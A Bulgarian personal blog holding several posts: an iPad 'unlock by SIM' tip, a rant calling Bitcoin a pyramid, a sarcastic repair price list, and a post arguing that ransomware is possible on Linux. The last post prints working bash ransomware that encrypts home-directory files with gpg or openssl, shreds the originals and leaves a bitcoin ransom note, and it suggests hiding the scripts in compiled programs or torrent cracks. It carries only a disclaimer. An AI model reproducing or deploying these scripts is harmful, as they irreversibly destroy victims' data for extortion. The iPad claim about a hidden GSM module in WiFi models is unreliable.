Когато iPad-ът не работи….

iPad-ът нещо взе, че блокира. Търсих, търсих и открих къде точно се крият проблемите му:

Сървърите на Apple подават грешна информация относно iCloud заключването. Това се оправя съвсем лесно, но работи само при WiFi версията: просто към iPad-ът трябва да включим SIM карта!!! Това става лесно дори и на iPad, който е само с WiFi – самият iPad си има GSM модул, който обаче не е активиран. Как да го активирате – гледайте във видеото по-долу!

Защо биткойнът е пирамида, и много хора ще загубят?

Биткойнът е пирамида. Само че в малко по-обратен ред: за да е добре този, който е на върха – трябва да са добре и маймунките по клоните надолу. Печели се от лакомията, и сега ще обясня за какво иде реч:

Някой вижда, че биткойна днес струва 1000$, утре – 1200$, след пет дни – 2000$. Тегли кредит, и купува 100 биткойна по 2000$. И тук идеа проблемът: той няма да ги продаде когато станат 5000$. Няма да ги продаде и когато станат 10.000$. Няма да ги продаде и когато станат 20.000$. Той ще седи, и ще чака да поскъпват още и още… това е човешката лакомия на принципа “колкото повече – толкова повече”. Да, обаче един хубав слънчев ден всичко ще се срине. Този, който е на върха (разбирай  – човека с най-многко биткойни) ще реши, че иска да ги продаде. Ще настане момент, когато ще има прекалено голямо предлагане, малко търсене и… цената ще се срине точно по начинът, по който се качи. Само че тогава много народ ще реве. И то ще реве не заради друга причина, а заради лакомията. И именно тази лакомия в момента определя цената, защото всеки гледа да се “запаси”. Продават малките играчи – тези с по 1-2 койна. Останалите са лакоми и алчни, и трупат някакви цифрички във виртуалните си портфейли. Това (покачването на цената) ще спре в момента, в който изчезнат малките играчи от пазара – онези, които не са алчни, и продават на сегашната цена. И после – срив…. А лакомите – те някой ден ще стоят, и ще си гледат едни цифрички в портфейлите, а те ще си останат вечно техни. Не случайно има една поговорка, малко груба: “лаком гъз кръв сере”.

Ще спечелят онези, които управляват биткойна. И не, той не е децентрализиран. Нито е извън контрол. Всичко е така както трябва да бъде. Никой никога и никъде няма да създаде нещо, което не може да контролира. Това е правило, което никога няма да бъде нарушено.

Поправка на компютри/телефони…

Защо спрях да поправям компютри и телефони?

Причините са няколко… една от тях е – не си заслужава. Не е оправдано да се занимава човек с това начинание. Особено, когато е заобиколен от “приятели”, които си мислят, че те са с предимство, и че не трябва да плащат за услугите. И “аз някой ден ши пучерпъ”, “ай мирси многу, аку имъ нйещу – убаждъй съ”.

Например, най-често срещан проблем: преинсталация на Виндовс. В 99.99% от случаите се появява накой с пиратски виндовс, разбира се – Windows 7 Ultimate, инсталиран на 10-годишен дарак, на който незнайно защо му викат “компютър”. Инсталирането отнема няколко часа, после следват update-и, след което инсталиране на някакъв софтуер. И ако трябва да се запазва информация – отиде цял ден. И за това нещо повечето не са склонни да платят повече от 10 лева, щото “то става лесно, ама аз просто нямам време да си го направя сам”. Е, като е лесно – оправяйте се.

Другият проблем е, че си купуват компютри трета употреба – “ама виж го бйе, той кът ноф”… за по 100-150 лева парчето. Със стари процесори, стари памети и бавни дискове. А иска на тоя компютър да “варви сичку”. Иди му обяснявай що насичат клиповете в ютуб…. “ма той кумпютътъ йе ноф бйе, на стару сам гу гупил амаъ той ней исползвън многу”. Е па нема да стане!

Най-гоемият нагляр заяви, че “нося го на тебе, щото в сервиза ми искат 60 лева, а тебе като те черпя една бира и си готов”…. е, еби си майката! Оправяй се самостоятелно. Не съм ти умрял за шибаната топал бира. Айде у сервизо, да видиш как пипат хората там!

Друг нагляр, на който препоръчах сервиз – “да, ама те там ще ми искат пари!”…. казах му, че там взимат 60 лева, а аз взимам 200 и ще му е по-изгодно в сервиза. Разсърди се. През кура ми е.

Друго нещо са телефоните: счупено дисплейче, бъгнал телефон и т.н., и пак всеки мисли, че си длъжен да му го оправиш, като дори вложиш и части… ама само щото един-два пъти ти е казал “здрасти” като сте се разминали по пътя – ти е голям “приятел”, и следва да мине метър и да не плати. Е, няма как да стане. Бегом в сервиза – там ще ти помогнат.

“Ама само трябва да ми видиш една настройка, то е много лесно и бързо” – като е много лесно и бързо оправяй се. Някакви си измекяри си поставят сами “диагноза” на проблема, решават колко е дребен той, и как всичко трябва да стане ей сега на момента веднага, и то – без пари. Е, няма как.

Ценоразписът ми е следният:

  • Инсталиране на Windows без запазване на информация, и без допълнителен софтуер: 200 лева; Със софтуер, предоставен от клиента.
  • Инсталиране на Windows – със запазване на информация + инсталиране на скайп, “оправянв” на фейсбук и т.н. – 650 лева, включен лицензен Виндовс.
  • Ремонт на лаптоп (проблем, който е “елементарен” и е “само за 5 минути работа”, колкото “само да го погледнеш”) – 250 лева;
  • Ремонт на компютър, който “не работи, ама то е нещо дребно” – цената на нов компютър + 250 лева;
  • Ремонт на стар лаптоп/компютър, който “е стар, ама си работи и само тука едно-две дребни неща трябва да се погледнат” – 350 лева;
  • Ремонт на телефон, който “само тука едни настройки му пипах, ама ти бързо ще го оправиш” – 150 лева;
  • Оправяне на андроид, който “тука като му инсталирах едни програми от едни сайтове и нещо започна да работи бавно и май има вируси” – 1500 лева;
  • Смяна на счупен дисплей (от тези, които се сменят само за 5 минути) – 250 лева + цената на нов дисплей;
  • “Ай да ми направиш айклауд, че си взех айфон ама не знам как да се оправя с регистрациите” – 250 лева;
  • “Как ми е паролата за айклауда, преди 2 години ти ми го прави и трябва да помниш, щото аз не си знам паролата” – 250 лева за отговор “не знам”;

За “приятели” горните цени се умножават по 1.5. За нахални приятели, които много държат всичко да стане сега и веднага – горните цени се умножават по 3.

За такива, които се сещат само когато са на зор – горните цени се умножават по 10.

 

Ransomware в Linux – възможно ли е?

МОЛЯ, ИМАЙТЕ ПРЕДВИД, ЧЕ АКО ИЗПРОБВАТЕ ПОКАЗАНИТЕ ТУК КОМАНДИ Е МНОГО ВЕРОЯТНО ТОВА ДА ДОВЕДЕ ДО БЕЗВЪЗВРАТНА ЗАГУБА НА ФАЙЛОВЕТЕ ВИ! АКО ВСЕ ПАК СТЕ РЕШИЛИ ДА ИЗПРОБВАТЕ НЕЩО ОТ ПОКАЗАНОТО ТУК – ПРАВЕТЕ ГО ИЗЦЯЛО НА СВОЙ РИСК И ОТГОВОРНОСТ! ВСИЧКО, ПОКАЗАНО ТУК Е С ДЕМОНСТРАЦИОННА ЦЕЛ! АВТОРЪТ НЕ НОСИ НИКАКВА ОТГОВОРНОСТ ЗА КАКВИТО И ДА Е ВРЕДИ И/ИЛИ ПОВРЕДИ – РЕАЛНИ ИЛИ ВЪОБРАЖАЕМИ, НАСТЪПИЛИ В РЕЗУЛТАТ НА ИЗПОЛЗВАНЕТО НА ПОКАЗАНАТА ТУК ИНФОРМАЦИЯ!!!

АКО ВСЕ ПАК РЕШИТЕ ДА ИЗПОРОБВАТЕ НЕЩО – ВИ СЪВЕТВАМ ДА ГО ПРАВИТЕ В ИЗОЛИРАНА ВИРТУАЛНА МАШИНА! 

Възможно ли е да има ransomware в Linux? Или…. мит ли е по-голямата сигурност, ако ползваме Linux за десктоп?

Отговорът е ДА. Възможно е. Самият Линукс разполага с необходимите инструменти, с които може да се извърши криптирането на файловете. А как ще се задейства това – е въпрос на избор на този, който реши да създаде ransomware за Linux.

Покрай WannaCry паниката, която е напълно излишна (защото нито е първи, нито ще е последен ransomware) се породиха много спорове из форумите как видите ли – Виндовс бил уязвим, ама за Линукс нямало никакъв риск, защото тези неща не вървели не Линукс….

Както вече стана ясно – WannaCry работи перфектно и на Линукс, стига да имате Wine. А то почти всеки има ?

Възможно ли е да се направи нещо подобно и на Линукс? Разбира се.

Та, един пример:

for f in $(find ~/ -name ‘*.txt’ -or -name ‘*.jpg’ -or -name ‘*.png’); do echo “1234” | gpg –batch –no-tty –yes –passphrase-fd 0 -c -o $f.enc $f; done

И за да кажем как да ни платят, и да сме истински хакери, като омажем максимално оригиналните файлове:

for f in $(find ~/ -name ‘*.txt’ -or -name ‘*.jpg’ -or -name ‘*.png’); do echo “1234” | gpg –batch –no-tty –yes –passphrase-fd 0 -c -o $f.enc $f; shred $f; echo “Send 10000 bitcoins to get your data back”>$f; done

Вместо gpg може да ползеаме openssl, ето един примерен и изключително прост bash скрипт, който върши перфектна работа:

#!/bin/bash

ENCRYPT=`tr -dc A-Za-z0-9_ < /dev/urandom | head -c 150 | xargs`

for f in $(find ~/ -name ‘*.txt’ -or -name ‘*.jpg’ -or -name ‘*.png’ -or -name ‘*.jpeg’ -or -name ‘*.pdf’ -or -name ‘*.doc’ -or -name ‘*.docx’);

do openssl des3 -k $ENCRYPT -in $f -out $f.encrypted; shred $f;

echo “Send 0.4 bitcoins to get your data back: 1G9Emf3VRMrm1pZEzFs6ZqAwHdUuijJ4Et ” > $f;

done

echo $ENCRYPT > PRIVATE.KEY

Декриптиране – в случай, че имаме паролата:

#!/bin/bash

DECRYPT=`cat PRIVATE.KEY` 

for f in $(find ~/ -name ‘*.encrypted’); 

do 

openssl des3 -k $DECRYPT -d -in $f -out ${f%.*}; 

rm $f; 

done

Последното ще работи само и единствено ако имаме паролата.

като след find-а може да има колкто си искаме *.нещоси, като и накрая като се добави едно rm $f, или за да сме още по-зли: shred $f;

Това нещо ще криптира всички *.txt., *.jpg, *.png файлове. Този списък може да се разшири до безкрайност.

Това чудо например се преобразува в shellcode, набутва се в накой дълъг .c файл, който е част от някаква програмка, която потребителят ще се излъже да комилира и стартира, и… стават чудеса

Друг вариант е да се изсипе чрез някой торент – напр. като крак, като keygen, като част от някаква програмка… варианти има хиляди.

Едно стартиране, и файловете са криптирани безвъзвратно…

Как ще се подаде паролата (в случая – 1234) и дали по някакъв начин скрипта ще я вземе “отвън”, ще я генерира на момента (напр. tr -dc A-Za-z0-9_ < /dev/urandom | head -c 150 | xargs) и ще я изпрати към външен сървър, за да я съхранява там – вариантите пак са много.

Скрипт, използващ gpg:

#!/bin/bash

ENCRYPT=`tr -dc A-Za-z0-9_ < /dev/urandom | head -c 150 | xargs`
for f in $(find ~/ -name ‘*.txt’ -or -name ‘*.jpg’ -or -name ‘*.png’); do echo $ENCRYPT | gpg –batch –no-tty –yes –passphrase-fd 0 -c -o $f.enc $f; shred $f; echo “Send 10000 bitcoins to get your data back”>$f; done
echo “$ENCRYPT”>PRIVATE.KEY;

Ако ще пробвате нещо – ключа се записва в PRIVATE.KEY в текущата директория. Декриптиранрто става по обратен ред, именно:

PW=`cat PRIVATE.KEY`

echo $PW | gpg –batch –no-tty –yes –passphrase-fd 0 -d -o original-decrypted-file.txt encrypted-file.txt.enc

Та, в 90% от случаите не са виновни операционните системи, а хората които работят с тях. Защо ли? Да вземем за пример Виндовс:

Инсталират се основно пиратски версии, от Замунда. Първата работа на инсталиращия е да спре update-ите на Виндовса… познавам хора, които се мислят за особено големи разбирачи, и спират упдейтите дори на лицензен Виндовс, защото, цитирам: “закво са ми тия упдейти, само ми бавят компютъра”.

За Линукс пък заблудата е друга: че такива атаки там били невъзможни. Не, не са невъзможни а просто Линукс не е интересен за хакерите.

Това, което пишат масово по форуми и блогове – “инсталирайте си Линукс и ще забравите за вирусите” изобщо, ама изобщо не е така. Варианти винаги има! Дали нещо ще се изпълни през Wine, дали ще е забутано някъде – няма никакво значение. А на този криптиращ скрипт не му трябват никакви права – той ще си свърши работата в потребителската директория, а с малко тунинг (find / -writable) ще претърси цялата система за файлове, които са с права за писане за съответният потребител и ще ги омаже както си иска. Ако пък някой вземе, че го пусне с администраторски права…. става мазало. И ако нямаш паролата, за да изпълниш gpg -d $f.enc

Някой ще каже “ама аз може да нямам gpg”. Може бе, ама… мисля, че идеята е ясна.

С малко фантазия и няколко реда код могат да се сътворят такива бели, че после оправия да няма.

Всеки запален по Линукс твърди, че е недосегаем…. е, не съвсем.

Тъй като на някои места видях коментари, че ползването на urandom било “бавно”… не е съвсем бавно! urandom се ползва в случая само и единствено за генериране на 150-символна random парола. И повярвайте – става доста бързо…

gpg било бавно… ами ОК, ей го на и с openssl. Бавно бавно… колко да е бавно? Който мисли, че е бавно – да си създаде един потребител в линукса, и да му напъли home директорията с разни снимки и документи, пък да тества ?  1.1GB данни (снимки + текстови файлове):

с gpg:

time ./encrypt.sh
real 0m23.455s

user 0m10.700s

sys 0m0.937s

с openssl:

time ./openssh.sh
real 0m10.663s

user 0m1.257s

sys 0m0.561s

1.1GB за 23 секунди в пъряия случай, и за 10 – във втория. Не мисля, че е много бавно.

Ама било нямало как да се разпространи – не ми е това идеята, иначе повярвайте – може. Всичко може.  Просто не искам да го правя, защото няма смисъл.

Wana Kiwi – Wana Cry Decriptor tool

Едва ли ще свърши работа, но все пак си е нещо:

Ако сте заразени с Wana Cry, и искате да си спасите файловете имате шанс. НО! Не трябва да сте си рестартирали компютъра след каото е бил заразен

Ако не сте го рестартирали, може да изтеглите decryptor от тук: https://github.com/gentilkiwi/wanakiwi/releases

 

А за повече информация тук:

http://thehackernews.com/2017/05/wannacry-ransomware-decryption-tool.html